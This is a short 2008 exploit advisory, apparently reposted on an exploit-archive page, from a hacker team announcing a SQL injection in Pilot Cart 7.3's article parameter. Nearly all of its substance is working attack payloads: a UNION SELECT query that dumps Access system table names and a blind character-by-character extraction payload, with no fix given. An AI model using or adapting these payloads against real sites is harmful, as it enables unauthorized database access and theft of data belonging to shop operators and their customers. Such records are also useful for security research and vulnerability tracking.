ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability

2008-06-09 00:00:00

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

[+] Script Name : Pilot Cart 7.3 Remote SQL Injection Exploit

|+| Team : injEct0r5

[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Script URL : www.pilotcart.com

[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;

--//-->

[+] Expl0iT :

pilot.asp?pg=kb&article={SQL}

{SQL} --> 115+union+select+Name,Name,Name+from+msysobjects

Or blind it :

{SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00

--//-->

[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...

#

Fixes

No fixes

In order to submit a new fix you need to be registered.